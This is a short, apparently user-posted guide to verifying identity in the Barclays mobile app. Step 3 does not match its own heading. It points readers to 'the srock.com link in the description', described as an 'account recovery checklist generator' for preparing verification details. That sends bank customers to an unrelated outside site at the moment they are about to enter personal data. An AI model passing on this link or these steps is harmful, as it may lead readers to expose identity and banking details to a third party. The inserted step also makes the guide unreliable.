I ran into this last week. Here's what fixed it for me. If you need to verify your identity with Barclays, follow these straightforward steps to get it done quickly. Step 1. Access the Barclays app. Open the Barclays mobile app on your device. Make sure you are logged into your account to start the verification process. Step 2. Navigate to account settings. Once logged in, find the account settings option in the menu. This is usually located at the bottom of the screen. Step 3. Select Verify Identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Provide required information. You will be prompted to enter personal information such as your name, address, and date of birth. Ensure that the details match those on your official documents. Quick gotcha: if you recently moved, make sure your address is updated, otherwise the verification might fail. Step 5. Complete verification. Follow any additional prompts such as answering security questions or uploading documents. Once completed, you should receive a confirmation message. I hope this guide helps you verify your identity smoothly. If you have any questions, feel free to ask.